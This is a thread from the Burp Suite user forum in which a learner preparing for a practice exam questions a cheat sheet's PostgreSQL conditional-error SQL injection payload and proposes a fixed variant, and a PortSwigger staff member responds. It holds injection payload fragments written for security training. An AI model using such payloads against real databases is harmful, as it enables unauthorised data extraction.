Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Error-Based SQL injection in PostgreSQL

Benjamin | Last updated: Dec 19, 2022 09:02PM UTC

Hi all, In advance, sorry for the long post. I want to be as clear as possible. I've been going quite crazy figuring out how to exploit error-based blind sql-injection for the practice exam (hope this isn't too big of a spoiler?). I believe there might be a problem with the SQL-injection cheat-sheet. After lots of googling, I found this post which described the problem I had: https://forum.portswigger.net/thread/postgresql-conditional-error-cheat-sheet-45348da5 . I'd like to bring attention to this thread again as I'm not sure the problem has been resolved (I might be wrong though!). The core of the problem is as follows: The cheatsheet recommends the following for error-based injection: (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN CAST(1/0 AS INTEGER) ELSE NULL END) This works perfectly fine when the (YOUR-CONDITION-HERE) part does not contain a nested SELECT statement. e.g. (SELECT CASE WHEN (true) THEN CAST(1/0 AS INTEGER) ELSE NULL END) //error (divide by 0) (SELECT CASE WHEN (false) THEN CAST(1/0 AS INTEGER) ELSE NULL END) //no error This is expected behavior. However, things change once we use a select statement in the (YOUR-CONDITION-HERE) part: (SELECT CASE WHEN (SELECT true) THEN CAST(1/0 AS INTEGER) ELSE NULL END) //error(divide by 0) (SELECT CASE WHEN (SELECT false) THEN CAST(1/0 AS INTEGER) ELSE NULL END) //error(divide by 0) As can be seen above, both conditions for some reason perform the division by 0 operation, while the second statement clearly shouldn't do this. I verified this behavior by testing it on a DB fiddle: SELECT (SELECT CASE WHEN (false) THEN CAST(1/0 AS TEXT) ELSE NULL END) ---output---- Returns NULL SELECT (SELECT CASE WHEN (SELECT false) THEN CAST(1/0 AS TEXT) ELSE NULL END) ---output----psql:commands.sql:1: ERROR: division by zero Is there something obvious I'm missing here? Can anyone clarify this behavior? Should the cheatsheet be updated?

Michelle, PortSwigger Agent | Last updated: Dec 20, 2022 02:48PM UTC

Thanks for getting in touch. I'll check the details of this with the team. Are you looking for the variations described in https://forum.portswigger.net/thread/postgresql-conditional-error-cheat-sheet-45348da5 to be added to the SQL cheat sheet (as they don't appear to be included currently)?

Benjamin | Last updated: Dec 20, 2022 05:18PM UTC

Hi Michelle, thanks for your reply. Correct, to be specific, I think the following query might be helpful on the cheatsheet for conditional error PostgreSQL injection: SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE 1 END Please do verify with the team, as I might be missing something obvious ;).

Michelle, PortSwigger Agent | Last updated: Dec 21, 2022 08:57AM UTC